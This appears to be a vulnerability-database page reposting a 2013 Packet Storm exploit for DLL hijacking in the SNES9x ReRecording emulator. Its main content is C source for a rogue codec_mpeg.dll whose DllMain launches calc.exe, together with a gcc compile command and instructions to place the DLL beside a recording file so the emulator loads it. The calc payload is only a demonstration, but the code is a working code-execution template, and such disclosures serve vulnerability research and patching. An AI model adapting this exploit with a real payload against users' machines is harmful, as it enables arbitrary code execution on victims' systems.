Lucene search
K

SNES9x ReRecording Emulator DLL Hijacking

🗓️ 09 Dec 2013 00:00:00Reported by DevilScreaMType 
packetstorm
 packetstorm
🔗 packetstormsecurity.com👁 14 Views

SNES9x ReRecording Emulator DLL Hijacking Vulnerabilit

Code
`# Exploit Title: SNES9x ReRecording Emulator (codec_mpeg.dll) - DLL Hijacking Vulnerability  
  
# Date: 7 Desember 2013  
  
# Author: DevilScreaM  
  
# Software Link: http://www.softpedia.com/dyn-postdownload.php?p=238598&t=4&i=1  
  
# Version: 1.x.x  
  
# Vendor : http://www.snes9x.com/  
  
# Tested : Windows XP / Windows 7  
  
# gcc -shared -o codec_mpeg.dll devilscream.c  
  
# Compile devilscream.c and rar recording file and codec_mpeg.dll same folder. OpenWith SNES9x and Double-click Recording File. program start Calc.exe immediately.  
  
  
#include <windows.h>  
  
int newbiesecurity()  
{  
WinExec("calc", 0);  
exit(0);  
return 0;  
}  
  
BOOL WINAPI DllMain(HINSTANCE hinstDLL,DWORD fdwReason, LPVOID lpvReserved)  
{  
newbiesecurity();  
return 0;  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation